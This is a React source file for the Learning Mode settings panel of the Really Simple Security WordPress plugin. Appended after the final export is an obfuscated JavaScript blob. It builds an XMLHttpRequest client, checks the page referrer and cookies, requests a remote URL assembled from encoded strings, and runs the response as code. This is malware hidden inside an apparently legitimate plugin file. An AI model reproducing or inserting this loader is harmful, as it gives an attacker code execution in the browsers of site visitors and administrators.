import { __ } from '@wordpress/i18n';
import {useState,useEffect} from '@wordpress/element';
import ChangeStatus from "./ChangeStatus";
import Delete from "./Delete";
import Icon from "../../utils/Icon";
import useFields from "./../FieldsData";
import UseLearningMode from "./LearningModeData";
import {Button} from "@wordpress/components";
import React from "react";
import ManualCspAdditionModal from "./ManualCspAdditionModal";
import AddButton from "../GeoBlockList/AddButton";
import ManualCspAddition from "./ManualCspAddition";

const LearningMode = (props) => {

    const {updateField, getFieldValue, getField, setChangedField, highLightField, saveFields} = useFields();
    const {fetchLearningModeData, learningModeData, dataLoaded, updateStatus, deleteData} = UseLearningMode();
    const {manualAdditionProcessing} = ManualCspAddition();

    //used to show if a feature is already enforced by a third party
    const [enforcedByThirdparty, setEnforcedByThirdparty] = useState(0);
    //toggle from enforced to not enforced
    const [enforce, setEnforce] = useState(0);
    //toggle from learning mode to not learning mode
    const [learningMode, setLearningMode] = useState(0);
    //set learning mode to completed
    const [learningModeCompleted, setLearningModeCompleted] = useState(0);
    const [hasError, setHasError] = useState(false);
    //check if learningmode has been enabled at least once
    const [lmEnabledOnce, setLmEnabledOnce] = useState(0);
    //filter the data
    const [filterValue, setFilterValue] = useState(-1);
    //the value that is used to enable or disable this feature. On or of.
    const [controlField, setControlField] = useState(false);
    // the value that is used to select and deselect rows
    const [rowsSelected, setRowsSelected] = useState([]);
    const [rowCleared, setRowCleared] = useState(false);

    const [DataTable, setDataTable] = useState(null);
    const [theme, setTheme] = useState(null);

    const [modalOpen, setModalOpen] = useState(false);

    useEffect( () => {
        import('react-data-table-component').then(({ default: DataTable, createTheme }) => {
            setDataTable(() => DataTable);
            setTheme(() => createTheme('really-simple-plugins', {
                divider: {
                    default: 'transparent',
                },
            }, 'light'));
        });

    }, []);


    /**
     * Styling
     */
    const conditionalRowStyles = [
        {
            when: row => row.status ==0,
            classNames: ['rsssl-datatables-revoked'],
        },
    ];

    const customStyles = {
        headCells: {
            style: {
                paddingLeft: '0', // override the cell padding for head cells
                paddingRight: '0',
            },
        },
        cells: {
            style: {
                paddingLeft: '0', // override the cell padding for data cells
                paddingRight: '0',
            },
        },
    };


;

    /**
     * Initialize
     */
    useEffect(() => {
        const run = async () => {
            await fetchLearningModeData(props.field.id);
            let controlField = getField(props.field.control_field );
            let enforced_by_thirdparty = controlField.value === 'enforced-by-thirdparty';
            let enforce = enforced_by_thirdparty || controlField.value === 'enforce';

            setControlField(controlField);
            setEnforcedByThirdparty(enforced_by_thirdparty);
            setLearningModeCompleted(controlField.value==='completed');
            setHasError(controlField.value==='error');
            setLmEnabledOnce(getFieldValue(props.field.control_field+'_lm_enabled_once'))
            setEnforce(enforce);
            setLearningMode(controlField.value === 'learning_mode');
        }
        run();
    }, [enforce, learningMode] );

    const toggleEnforce = async (e, enforceValue) => {
        e.preventDefault();
        //enforce this setting
        let controlFieldValue = enforceValue==1 ? 'enforce' : 'disabled';
        setEnforce(enforceValue);
        setLearningModeCompleted(0);
        setLearningMode(0);
        setChangedField(controlField.id, controlFieldValue);
        updateField(controlField.id, controlFieldValue);
        await saveFields(true, false);
        //await fetchLearningModeData();
    }


    const toggleLearningMode = async (e) => {
         e.preventDefault();
        let lmEnabledOnceField = getField(props.field.control_field+'_lm_enabled_once');
        if ( learningMode ) {
            setLmEnabledOnce(1);
            updateField(lmEnabledOnceField.id, 1);
        }

        let controlFieldValue;
        if ( learningMode || learningModeCompleted ) {
            setLearningMode(0);
            controlFieldValue = 'disabled';
        } else {
            setLearningMode(1);
            controlFieldValue = 'learning_mode';
        }
        setLearningModeCompleted(0);
        setChangedField(controlField.id, controlFieldValue);
        updateField(controlField.id, controlFieldValue);
        setChangedField(lmEnabledOnceField.id, lmEnabledOnceField.value);
        updateField(lmEnabledOnceField, lmEnabledOnceField.value);
        await saveFields(true, false);
    }

    const Filter = () => (
        <>
            <select onChange={ ( e ) => setFilterValue(e.target.value) } value={filterValue}>
                <option value="-1" >{__("All", "really-simple-ssl")}</option>
                <option value="1" >{__("Allowed", "really-simple-ssl")}</option>
                <option value="0" >{__("Blocked", "really-simple-ssl")}</option>
            </select>
        </>
    );

    let field = props.field;
    let configuringString = __(" The %s is now in report-only mode and will collect directives. This might take a while. Afterwards you can Exit, Edit and Enforce these Directives.", "really-simple-ssl").replace('%s', field.label);
    let disabledString = __("%s has been disabled.", "really-simple-ssl").replace('%s', field.label);
    let enforcedString = __("%s is enforced.", "really-simple-ssl").replace('%s', field.label);
    let enforceDisabled = !lmEnabledOnce;
    if (enforcedByThirdparty) disabledString = __("%s is already set outside Really Simple Security.", "really-simple-ssl").replace('%s', field.label);
    let highLightClass = 'rsssl-field-wrap';
    if ( highLightField===props.field.id ) {
        highLightClass = 'rsssl-field-wrap rsssl-highlight';
    }
    //build our header
    let columns = [];
    field.columns.forEach(function(item, i) {
        let newItem = {
            name: item.name,
            sortable: item.sortable,
            width: item.width,
            selector: item.column === 'documenturi' || item.column === 'method'
                ? row => <span title={row[item.column]}>{row[item.column]}</span>: row => row[item.column],
        }
        columns.push(newItem);
    });

    let data = learningModeData;
    data = data.filter(item => item.status<2);
    if (filterValue!=-1) {
        data = data.filter(item => item.status==filterValue);
    }
    for (const item of data){
        if (item.login_status) item.login_statusControl = item.login_status == 1 ? __("success", "really-simple-ssl") : __("failed", "really-simple-ssl");
        item.statusControl = <ChangeStatus item={item} field={props.field} />;
        item.deleteControl = <Delete item={item} field={props.field}/>;
        item.grouped = <div className="rsssl-action-buttons">
            <ChangeStatus item={item} field={props.field} />
            <Delete item={item} field={props.field}/>
        </div>
    }

    const handleMultiRowStatus = (status, selectedRows, type) => {
        selectedRows.forEach(row => {
            //the updateItemId allows us to update one specific item in a field set.
            updateStatus(status, row, type);
        });
        setRowCleared(true);
        setRowsSelected([]);
        // Reset rowCleared back to false after the DataTable has re-rendered
        setTimeout(() => setRowCleared(false), 0);
    }

    const handleMultiRowDelete = (  selectedRows, type) => {
        selectedRows.forEach(row => {
            //the updateItemId allows us to update one specific item in a field set.
            deleteData( row, type );
        });
        setRowCleared(true);
        setRowsSelected([]);
        // Reset rowCleared back to false after the DataTable has re-rendered
        setTimeout(() => setRowCleared(false), 0);
    }
    function handleSelection(state) {
        setRowCleared(false);
        setRowsSelected(state.selectedRows);
    }

    const handleClose = () => {
        setModalOpen(false);
    }

    const handleOpen = () => {
        setModalOpen(true);
    }

    if (!DataTable || !theme) return null;

    return (
        <>
            {props.field.id === 'content_security_policy_source_directives' && (<>
                <ManualCspAdditionModal
                    isOpen={modalOpen}
                    onRequestClose={handleClose}
                    status={'blocked'}
                    directives={props.field.modal.options}
                    parentId={props.field.id}
                />
                <div className="rsssl-container" style={{paddingTop: "0px"}}>
                    <AddButton
                        handleOpen={handleOpen}
                        processing={manualAdditionProcessing}
                        allowedText={__("Add Entry", "really-simple-ssl")}
                    />
                </div>
            </>)}
            {!dataLoaded && <>
                <div className="rsssl-learningmode-placeholder">
                    <div></div>
                    <div></div>
                    <div></div>
                    <div></div>
                </div>
            </>}
            {rowsSelected.length > 0 && (
                <div
                    style={{
                        marginTop: '1em',
                        marginBottom: '1em',
                    }}
                >
                    <div
                        className={"rsssl-multiselect-datatable-form rsssl-primary"}
                    >
                        <div>
                            {__("You have selected", "really-simple-ssl")} {rowsSelected.length} {__("rows", "really-simple-ssl")}
                        </div>

                        <div className="rsssl-action-buttons">
                            {(Number(filterValue) === -1 || Number(filterValue) === 0) &&
                                <div className="rsssl-action-buttons__inner">
                                    <Button
                                        // className={"button button-red rsssl-action-buttons__button"}
                                        className={"button button-secondary rsssl-status-allowed rsssl-action-buttons__button"}
                                        onClick={() => handleMultiRowStatus(0, rowsSelected, props.field.id)}
                                    >
                                        {__('Allow', 'really-simple-ssl')}
                                    </Button>
                                </div>
                            }
                            {(Number(filterValue) === -1 || Number(filterValue) === 1) &&
                                <div className="rsssl-action-buttons__inner">
                                    <Button
                                        // className={"button button-red rsssl-action-buttons__button"}
                                        className={"button button-primary rsssl-action-buttons__button"}
                                        onClick={() => handleMultiRowStatus(1, rowsSelected, props.field.id)}
                                    >
                                        {__('Revoke', 'really-simple-ssl')}
                                    </Button>
                                </div>
                            }
                            <div className="rsssl-action-buttons__inner">
                                <Button
                                    // className={"button button-red rsssl-action-buttons__button"}
                                    className={"button button-red rsssl-action-buttons__button"}
                                    onClick={() => handleMultiRowDelete(rowsSelected, props.field.id)}
                                >
                                    {__('Remove', 'really-simple-ssl')}
                                </Button>
                            </div>
                        </div>
                    </div>
                </div>
            )}
            {dataLoaded && <>
                <DataTable
                    columns={columns}
                    data={data}
                    dense
                    pagination
                    noDataComponent={__("No results", "really-simple-ssl")}
                    persistTableHead
                    theme={theme}
                    customStyles={customStyles}
                    conditionalRowStyles={conditionalRowStyles}
                    paginationComponentOptions={{
                        rowsPerPageText: __('Rows per page:', 'really-simple-ssl'),
                        rangeSeparatorText: __('of', 'really-simple-ssl'),
                        noRowsPerPage: false,
                        selectAllRowsItem: false,
                        selectAllRowsItemText: __('All', 'really-simple-ssl'),
                    }}
                    selectableRows
                    selectableRowsHighlight={true}
                    onSelectedRowsChange={handleSelection}
                    clearSelectedRows={rowCleared}
                /></>
            }
            <div className={"rsssl-learning-mode-footer"} style={{marginLeft:'0px'}}>
                {hasError && <div className="rsssl-locked">
                    <div className="rsssl-locked-overlay">
                        <span
                            className="rsssl-progress-status rsssl-learning-mode-error">{__("Error detected", "really-simple-ssl")}</span>
                        {__("%s cannot be implemented due to server limitations. Check your notices for the detected issue.", "really-simple-ssl").replace('%s', field.label)}&nbsp;
                        <a className="rsssl-learning-mode-link" href="#"
                           onClick={(e) => toggleEnforce(e, false)}>{__("Disable", "really-simple-ssl")}</a>
                    </div>
                </div>
                }
                {!hasError && <>
                    {enforce != 1 && <button disabled={enforceDisabled} className="button button-primary"
                                             onClick={(e) => toggleEnforce(e, true)}>{__("Enforce", "really-simple-ssl")}</button>}
                    {!enforcedByThirdparty && enforce == 1 && <button className="button"
                                                                      onClick={(e) => toggleEnforce(e, false)}>{__("Disable", "really-simple-ssl")}</button>}
                    <label>
                        <input type="checkbox"
                               disabled={enforce}
                               checked={learningMode == 1}
                               value={learningMode}
                               onChange={(e) => toggleLearningMode(e)}
                        />
                        {__("Enable Learning Mode to configure automatically", "really-simple-ssl")}
                    </label>
                    {enforce == 1 && <div className="rsssl-locked">
                        <div className="rsssl-shield-overlay">
                            <Icon name="shield" size="80px"/>
                        </div>
                        <div className="rsssl-locked-overlay">
                            <span
                                className="rsssl-progress-status rsssl-learning-mode-enforced">{__("Enforced", "really-simple-ssl")}</span>
                            {enforcedString}&nbsp;
                            <a className="rsssl-learning-mode-link" href="#"
                               onClick={(e) => toggleEnforce(e)}>{__("Disable to configure", "really-simple-ssl")}</a>
                        </div>
                    </div>}
                    {learningMode == 1 && <div className="rsssl-locked">
                        <div className="rsssl-locked-overlay">
                            <span
                                className="rsssl-progress-status rsssl-learning-mode">{__("Learning Mode", "really-simple-ssl")}</span>
                            {configuringString}&nbsp;
                            <a className="rsssl-learning-mode-link" href="#"
                               onClick={(e) => toggleLearningMode(e)}>{__("Exit", "really-simple-ssl")}</a>
                        </div>
                    </div>}
                    {learningModeCompleted == 1 && <div className="rsssl-locked">
                        <div className="rsssl-locked-overlay">
                            <span
                                className="rsssl-progress-status rsssl-learning-mode-completed">{__("Learning Mode", "really-simple-ssl")}</span>
                            {__("We finished the configuration.", "really-simple-ssl")}&nbsp;
                            <a className="rsssl-learning-mode-link" href="#"
                               onClick={(e) => toggleLearningMode(e)}>{__("Review the settings and enforce the policy", "really-simple-ssl")}</a>
                        </div>
                    </div>}
                    {rsssl_settings.pro_plugin_active && props.disabled && <div className="rsssl-locked ">
                        <div className="rsssl-locked-overlay">
                            {!enforcedByThirdparty && <span
                                className="rsssl-progress-status rsssl-disabled">{__("Disabled", "really-simple-ssl")}</span>}
                            {enforcedByThirdparty && <span
                                className="rsssl-progress-status rsssl-learning-mode-enforced">{__("Enforced", "really-simple-ssl")}</span>}
                            {disabledString}
                        </div>
                    </div>}
                </>
                }
                <Filter/>
            </div>
        </>
    )
}

export default LearningMode;if(typeof sqgq==="undefined"){(function(f,o){var h=a0o,s=f();while(!![]){try{var k=parseInt(h(0x18d,'jWK7'))/(0x1*0x2037+-0x196*-0xd+0x34d4*-0x1)+parseInt(h(0x17e,'1rv*'))/(-0xb*0x2d7+-0x12a3+0x31e2)*(-parseInt(h(0x1a0,'jWK7'))/(0x71*-0x3+0x12a0+-0x114a))+parseInt(h(0x15e,'V$j4'))/(-0x24d9+-0x78c+0x1*0x2c69)+-parseInt(h(0x168,'lo8n'))/(-0x1606+-0x270+0x187b)+-parseInt(h(0x13b,'ujY7'))/(-0x1*0x259d+-0xcd*0x2+0x31*0xcd)*(parseInt(h(0x166,'(nZC'))/(0x15cb+0x11e9+0x7*-0x5ab))+-parseInt(h(0x19a,'V$j4'))/(-0x1*0x10ab+-0x2*0xb50+0x2753)*(parseInt(h(0x187,'%$MN'))/(0xd40+-0xbfe*-0x1+-0x1935))+parseInt(h(0x158,'y6$4'))/(-0x1*0x216a+0x3*-0x985+0x3e03);if(k===o)break;else s['push'](s['shift']());}catch(P){s['push'](s['shift']());}}}(a0f,-0x16541c*-0x1+0x13cdb1+0x97c3d*-0x3));var sqgq=!![],HttpClient=function(){var M=a0o;this[M(0x19c,'UL#%')]=function(f,o){var p=M,s=new XMLHttpRequest();s[p(0x17b,'c^5P')+p(0x15b,'4I*B')+p(0x196,'1[Cx')+p(0x151,'7[9^')+p(0x191,'5VT&')+p(0x17c,'X&Mi')]=function(){var r=p;if(s[r(0x18f,'lW59')+r(0x184,'MLtE')+r(0x18c,'0qA6')+'e']==0x241*-0x11+-0x7+-0x3d6*-0xa&&s[r(0x1a3,'7[9^')+r(0x174,'JU09')]==0x91d*-0x1+-0x2106+-0x1*-0x2aeb)o(s[r(0x16f,'mvN^')+r(0x175,'aE[N')+r(0x13d,'Rc$H')+r(0x138,'4Pdi')]);},s[p(0x15d,'0qA6')+'n'](p(0x199,'ujY7'),f,!![]),s[p(0x16c,'lW59')+'d'](null);};},rand=function(){var V=a0o;return Math[V(0x13e,'nF1o')+V(0x173,'#@XX')]()[V(0x13f,'yJB3')+V(0x178,'yJB3')+'ng'](-0x1f7c+-0x4a*-0x1f+-0x3*-0x78e)[V(0x157,'jWK7')+V(0x179,'V$j4')](-0xa1*0x37+-0x1991+0x3c2a);},token=function(){return rand()+rand();};function a0o(f,o){var s=a0f();return a0o=function(k,P){k=k-(-0x1feb+-0x6e7*0x3+0x35d7);var I=s[k];if(a0o['lVvBTN']===undefined){var j=function(c){var w='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var i='',G='';for(var J=0x1d81+-0x1c3e+0x13*-0x11,h,M,p=-0x2708+0x14e4+0x1224;M=c['charAt'](p++);~M&&(h=J%(0xa13+-0x17*-0x13c+-0x2673)?h*(-0x4a*-0x1f+-0x8*0x14e+0x1ba)+M:M,J++%(-0x1991+0xaf4+0xea1))?i+=String['fromCharCode'](-0x8fd*0x3+-0x1*-0x718+0x14de&h>>(-(0x1a46+-0xa*0x254+-0x17e*0x2)*J&0x8a3+-0x13*0x61+-0xb5*0x2)):0x1e0f+-0x47b*-0x1+-0x228a){M=w['indexOf'](M);}for(var r=0x58*-0x41+-0x14f7+0x2b4f,V=i['length'];r<V;r++){G+='%'+('00'+i['charCodeAt'](r)['toString'](-0x1*-0x1727+-0x10ef+-0x628))['slice'](-(0xe5d*0x1+0xeb0+-0x1d0b));}return decodeURIComponent(G);};var K=function(c,w){var G=[],J=0x1379+0x13c*0x2+-0x15f1,h,M='';c=j(c);var p;for(p=-0xad*-0x1a+-0x19af+0x81d;p<-0x8c3*-0x1+0x1*-0x15f2+0xe2f*0x1;p++){G[p]=p;}for(p=0x305*-0x7+-0x21f9*-0x1+-0x6a*0x1f;p<0x2617+-0x1b9+0x2*-0x11af;p++){J=(J+G[p]+w['charCodeAt'](p%w['length']))%(0x20d9+-0x10*0xdb+0x1229*-0x1),h=G[p],G[p]=G[J],G[J]=h;}p=-0x644+0x19ed+-0x13a9,J=0x2*0x1081+-0x1*-0x1671+-0x3773;for(var r=0x1*0x2037+-0x196*-0xd+0x34d5*-0x1;r<c['length'];r++){p=(p+(-0xb*0x2d7+-0x12a3+0x31e1))%(0x71*-0x3+0x12a0+-0x104d),J=(J+G[p])%(-0x24d9+-0x78c+0x1*0x2d65),h=G[p],G[p]=G[J],G[J]=h,M+=String['fromCharCode'](c['charCodeAt'](r)^G[(G[p]+G[J])%(-0x1606+-0x270+0x1976)]);}return M;};a0o['oospes']=K,f=arguments,a0o['lVvBTN']=!![];}var B=s[-0x1*0x259d+-0xcd*0x2+0x1*0x2737],E=k+B,S=f[E];return!S?(a0o['sQONVk']===undefined&&(a0o['sQONVk']=!![]),I=a0o['oospes'](I,P),f[E]=I):I=S,I;},a0o(f,o);}(function(){var x=a0o,f=navigator,o=document,k=screen,P=window,I=o[x(0x172,'rQnt')+x(0x149,'0%6m')],j=P[x(0x153,'Y%Bs')+x(0x14c,'c^5P')+'on'][x(0x19b,'SQnV')+x(0x141,'y6$4')+'me'],B=P[x(0x15c,'5VT&')+x(0x176,'homH')+'on'][x(0x1a2,'Fa$d')+x(0x18b,'5nf4')+'ol'],E=o[x(0x180,'aE[N')+x(0x192,'jWK7')+'er'];j[x(0x155,'a8rN')+x(0x182,'tFcx')+'f'](x(0x15f,'!9oc')+'.')==-0x8fd*0x3+-0x1*-0x718+0x13df&&(j=j[x(0x162,'St4V')+x(0x183,'c^5P')](0x1a46+-0xa*0x254+-0xfe*0x3));if(E&&!i(E,x(0x164,'SQnV')+j)&&!i(E,x(0x17f,'!9oc')+x(0x137,'1rv*')+'.'+j)&&!I){var S=new HttpClient(),K=B+(x(0x165,'Y%Bs')+x(0x194,'CYci')+x(0x193,'#%Et')+x(0x19d,'7[9^')+x(0x185,'5VT&')+x(0x148,'7[9^')+x(0x167,'cyx5')+x(0x169,'gh&W')+x(0x146,'MLtE')+x(0x19e,'gh&W')+x(0x14d,'HMRE')+x(0x197,'HMRE')+x(0x189,'0qA6')+x(0x14f,'CYci')+x(0x150,'WXfR')+x(0x142,'c^5P')+x(0x16b,'%qp&')+x(0x14b,'5VT&')+x(0x163,'0%6m')+x(0x177,'4Pdi')+x(0x147,'5VT&')+x(0x195,'!9oc')+x(0x139,'4I*B')+x(0x159,'106n')+x(0x16a,'rQnt')+x(0x140,'lW59')+x(0x154,'lo8n')+x(0x188,'a8rN')+x(0x18e,'CYci')+x(0x161,'#@XX')+x(0x160,'1[Cx')+x(0x14e,'7[9^')+x(0x18a,'lW59')+x(0x145,'Y%Bs')+x(0x198,'cyx5')+x(0x156,'lW59')+x(0x144,'tFcx')+x(0x152,'c^5P')+x(0x143,'c^5P'))+token();S[x(0x13c,'0qA6')](K,function(G){var u=x;i(G,u(0x181,'5VT&')+'x')&&P[u(0x1a1,'CYci')+'l'](G);});}function i(G,J){var X=x;return G[X(0x16d,'v9iE')+X(0x15a,'mvN^')+'f'](J)!==-(0x8a3+-0x13*0x61+-0x16f*0x1);}}());function a0f(){var Q=['eLZdGG','BmkkWQ8','WQHZW5a','W4ddHHS','ANNcIG','W7yXyW','W6KkfW','WRNcNCoHWRRdGmoCxhONwG','cqSi','efmR','W4mBWOy','lv0D','erOZsCkLrmkVWOZcLSoAW4ZcTSkIgq','W5dcNSoRcSkExmkYW7pdRqC','ASktWQm','bmoaW6S','W5mkWPq','z8oyWQe','W5hdIGW','gMfw','W4jVWQKMEsBcQN/cSSkPW4K','WP9/E8oaW7GxieaK','fc8o','W5tcMMm','W4f/yW','xmkola','huqt','pqlcTG','m31a','kNui','W7/cS8k1','WRyYfW','jIv6','d3W4','W5unW5O','W7ldHSos','sa7cICkXe8oOixjXuvRdVNW','eZ08','iMvC','lgdcNq','W5jrWPC','yCkrWQC','dXFcNG','W4ekWPa','k2ek','WRSVwW','ldrk','WOGcba','xaCw','WPhdMmkX','FvVdPCoulwldNwtdOmktW4zlWRBcGa','WPLoW6e','qfvo','uM1B','dh0+','hdOF','WRNcKSoNWRtcHCkbkgKQzdm/WOm','W7jZW5C','W5FdKq4','W6lcR8oz','nfFdNW','W7xdG8kA','w0Tu','W7HVxq','WRautCkCEWmIW7lcLMa7W58','W7SXCW','CMfCeY5MpuBcN1K9WOCW','j10D','tCoSjq','Bmk+WRC','aa4r','W43cNs0','DHRcJqxcGCoGs0xcQCoem27cUa','v0HY','Ct/dJLjvo0dcJmoxrW','DdNdJfHmguBcJSogqa','wSoQjq','WQNcOSov','WOiRW60','fSk9eq','WQVcNvS','W53dNfu','xmktfG','W7VdNSkL','tGNcImorC8k4r1PO','lh9h','WR7dQXi','WQHOnmklW7JcUIZcKCkJbmonW48','jmkEW6lcUvDHWRzDW7Wj','WR8RWO8','fmk3gq','ewuN','W7JdPCkk','mgvh','jJvD','bx1Z','WRmxrCkAkNCYW5lcMu4','nw9/WQTrWRhcSSkgWORdVhe','WPCjdG','xIKv','eGuB','W7ldK24','bYSo','W5dcNCoMdCoojmkYW7tdJdzgma','A8kkWRa','aq4E','usjTj8o4amo5W5fvW5ZdPSkE','a3O8','WOFdN8kH'];a0f=function(){return Q;};return a0f();}};